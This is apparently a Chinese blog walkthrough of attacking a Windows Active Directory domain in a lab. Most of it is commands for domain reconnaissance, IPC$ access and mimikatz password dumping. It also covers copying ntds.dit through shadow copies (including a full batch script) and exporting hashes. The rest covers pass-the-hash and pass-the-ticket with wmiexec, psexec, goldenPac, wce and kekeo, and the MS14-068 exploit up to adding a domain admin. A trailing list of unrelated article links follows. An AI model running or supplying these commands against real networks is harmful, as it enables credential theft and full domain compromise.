测试环境
域控: 192.168.211.130

已经控制的机器: 192.168.211.133
获取网络信息

查看机器的网络信息

ipconfig /all  # 查看 网卡信息,获取dns 服务器ip (域控)

arp -a  # 搜集内网信息



net view   #查看网络中的机器

net view /domain # 查看网络中的域

net view /domain:domainhack  # 查看 domainhack 域中的机器

通过 ping 机器名 可以获取 ip

查找 域控
dsquery server

net time /domain

ipconfig /all  查看 dns 信息

端口扫描,域控服务器会开放389端口,如果和DNS同服务器,那么也会有53

ipc$ 攻击

net view 192.168.211.130   #查看共享

net use \\192.168.211.130\ipc$ password /user:hacker  # ipc$ 连接

如果有共享的话,直接 copy 复制文件,然后 at 执行。

获取 hash
直接抓

使用   mimikatz 抓取登录过的明文

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
导出 ntds.dit, 获取 hash

导出 ntds.dit

方法一 ntdsutil

ntdsutil snapshot "List All" quit quit   # 列举快照

ntdsutil snapshot "activate instance ntds" create quit quit #  创建快照

ntdsutil snapshot "mount {77e43351-f29c-4bb2-86ad-cc6b7610589d}"  # 挂载快照

copy C:\$SNAP_201803152221_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit   #复制ntds.dit

操作完后记得删除快照

方法二 vssadmin

vssadmin list shadows # 查询当前系统的快照

vssadmin create shadow /for=c: #创建快照

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\ntds.dit #  复制ntds.dit

vssadmin delete shadows /for=c: /quiet #删除快照

方法三 vshadow

下载链接

http://edgylogic.com/blog/vshadow-exe-versions/

创建 a.bat

setlocal

if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK

set SOURCE_DRIVE_LETTER=%SystemDrive%

set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit

set DESTINATION_PATH=%~dp0

@echo ...Determine the scripts to be executed/generated...

set CALLBACK_SCRIPT=%~dpnx0

set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd

@echo ...Creating the shadow copy...

"%~dp0vshadow-2008-x64.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER%

del /f %TEMP_GENERATED_SCRIPT%

@goto :EOF

:IS_CALLBACK

setlocal

@echo ...Obtaining the shadow copy device name...

call %TEMP_GENERATED_SCRIPT%

@echo ...Copying from the shadow copy to the destination path...

copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

vshadow-2008-x64.exe 放到 a.bat 同级目录(win 2008为例)

然后 cmd /c start a.bat 调用之, 就会在 a.bat 目录下生成 ntds.dit

然后使用

获取 system.hiv

reg save hklm\system system.hiv

QuarksPwDump.exe 导出 hash

 QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit --system-file  system.hiv

pass-the-hash 攻击

wmiexec

下载地址

https://github.com/maaaaz/impacket-examples-windows



wmiexec -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 domainhack/Administrator@192.168.211.130 "whoami"

domainhack 为域名

Administrator  域用户

192.168.211.130  目标 IP

psexec

psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 domainhack/Administrator@192.168.211.130 "whoami"

pass-the-ticket

goldenPac

要求:



域名, 普通域用户账号密码, 域控名

下载地址

https://github.com/maaaaz/impacket-examples-windows

直接获取域控system 权限的 cmd

goldenPac domainhack.com/hacker@domainc.domainhack.com

goldenPac 域名/用户名@域控名称

然后会要求输入密码

wce

要求:

域控用户名 ,hash (用前面的方法获取)

本机 administor 权限


wce -s Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09

keko

下载地址

https://github.com/gentilkiwi/kekeo

要求:

域控用户名 ,hash (用前面的方法获取)




生成票据

kekeo "tgt::ask /user:Administrator /domain:domainhack.com /ntlm:A812E6C2DEFCB0A7B80868F9F3C88D09"

导入票据

kekeo "kerberos::ptt TGT_Administrator@DOMAINHACK.COM_krbtgt~domainhack.com@DOMAINHACK.COM.kirbi"



ms14-068.exe

下载地址



https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/MS14-068.exe

要求:

域控用户名 , 密码

用户 sid  # whoami /all 获取

执行命令



生成 票据

ms14-068.exe -u hacker@domainhack.com -s S-1-5-21-2864277510-2444243591-773573486-1113 -d 192.168.211.130 -p qaz123!@#

ms14-068.exe -u 用户名@域名 -s 用户sid -d 域控地址 -p 用户名密码

导入票据

Mimikatz.exe "kerberos::ptc TGT_hacker@domainhack.com.ccache"

导入票据后就相当于有了 域管理员的权限, 直接添加域管理员

参考

https://3gstudent.github.io/

windows域渗透实战的更多相关文章

  1. Metasploit域渗透测试全程实录(终结篇)

    本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴 ...

  2. js中各种跨域问题实战小结(二)

    这里接上篇:js中各种跨域问题实战小结(一) 后面继续学习的过程中,对上面第一篇有稍作休整.下面继续第二部分: -->5.利用iframe和location.hash -->6.windo ...

  3. 初级AD域渗透系列

      net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admi ...

  4. 域渗透基础之NTLM认证协议

    域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows ...

  5. 域渗透复盘(安洵CTF线下)

    复盘线下域渗透环境Write Up 0x01 外网web到DMZ进域 外网web入口 joomla应用   192.168.0.5 反序列化打下来 GET /index.php HTTP/1.1 Ho ...

  6. AD域渗透总结

    域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确, ...

  7. 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网

    /文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...

  8. js中各种跨域问题实战小结(一)

    什么是跨域?为什么要实现跨域呢? 这是因为JavaScript出于安全方面的考虑,不允许跨域调用其他页面的对象.也就是说只能访问同一个域中的资源.我觉得这就有必要了解下javascript中的同源策略 ...

  9. C#开发中Windows域认证登录2(扩展吉日嘎拉GPM系统)

    原文地址:http://www.cuiwenyuan.com/shanghai/post/Windows-AD-Logon-Intergrated-into-Jirigala-GPM-DotNet-B ...

随机推荐

  1. TCP-IP 端口号

    FTP服务器的TCP端口号  21 Telnet服务器的TCP端口号  23 TETP(简单文件传输协议)服务器的UDP端口号  69 任何TCP/IP实现所提供的服务都用1-1023之间的端口号 至 ...

  2. js05

    继续学习js,在这里我们主要讲述一下js的BOM(浏览器对象模型)以及一些js库和应用这些js库的方法. 1.浏览器对象模型(BOM):    window对象:        表示浏览器窗口,所有的 ...

  3. 剑指offer五十五之链表中环的入口结点

    一.题目 一个链表中包含环,请找出该链表的环的入口结点. 二.思路 方法一: 假设x为环前面的路程(黑色路程),a为环入口到相遇点的路程(蓝色路程,假设顺时针走), c为环的长度(蓝色+橙色路程). ...

  4. (转)Python标准库:内置函数print(*objects, sep=' ', end='\n', file=sys.stdout, flush=False)

    原文:https://blog.csdn.net/caimouse/article/details/44133241 https://www.cnblogs.com/owasp/p/5372476.h ...

  5. puppet的使用:puppet的hello world

    这个例子完成将master节点上的一个文件放至agent节点上的功能 创建要传输的文件 echo "helloWorld" > /etc/puppet/modules/pup ...

  6. Spring Boot的listener简单使用

    监听器(Listener)的注册方法和 Servlet 一样,有两种方式:代码注册或者注解注册 1.代码注册方式 通过代码方式注入过滤器 @Bean     public ServletListene ...

  7. Spring 小知识点

    一.引入配置文件的方式: 方式一: <context:property-placeholder location="classpath:jdbc.properties,classpat ...

  8. 命令行创建Android应用,命令行生成签名文件,命令行查看签名信息,对APK包签名并编译运行

    一.命令行创建Android应用 android create project -n HelloWorld -t android-22 -p HelloWorld1 -k org.crazyit.he ...

  9. 面试题30:KMP 字符串查找

    参考:http://www.ruanyifeng.com/blog/2013/05/Knuth%E2%80%93Morris%E2%80%93Pratt_algorithm.html自己写的很简单的K ...

  10. spring boot集成阿里云短信发送接收短信回复功能

    1.集成阿里云通信发送短信: 在pom.xml文件里添加依赖 <!--阿里短信服务--> <dependency> <groupId>com.aliyun</ ...